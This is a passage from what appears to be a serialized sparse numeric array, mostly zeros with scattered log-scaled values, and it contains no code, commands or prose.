\n 7.149543163850748, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 1.7412592803704001, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 4.66682536764049, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 7.27447955877387, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, \n 3.4825185607408002, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.9459101490553132, 0, \n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, \n 9.722561256775933, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.0910424533583156, 0.0, 0, 0, 0.0, 0, 0, 1.0986122886681098, \n 4.795790545596741, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.175867270105761, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 4.292158018817389, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 3.4825185607408002, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 2.772588722239781, \n 0.0, 0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 2.1972245773362196, 0.0, 0.0, 2.1972245773362196, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0910424533583156, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 10.112432770990234, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 1.9459101490553132, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 5.723585101952381, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.3322045101752034, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 2.0794415416798357, 1.7412592803704001, 2.1972245773362196, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, \n 2.1972245773362196, 0.0, 2.833213344056216, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 1.791759469228055, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 3.58351893845611, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.6390573296152584, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0, 0.0, \n 2.772588722239781, 2.550898738446989, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 1.3862943611198906, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 4.292158018817389, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 4.718498871295094, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 4.624972813284271, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 8.98107381374378, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.70805020110221, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 3.7612001156935624, 0.0, 0, 0, 0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 3.784189633918261, 0, 0.0, 0.0, 0.0, 0, 0, 0, \n 3.58351893845611, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0, 0.0, 0, 2.70805020110221, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, 0.0, 0.0, 3.58351893845611, 0.0,\n 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 4.382026634673881, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.6390573296152584, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.8918202981106265, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 4.182806904693496, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 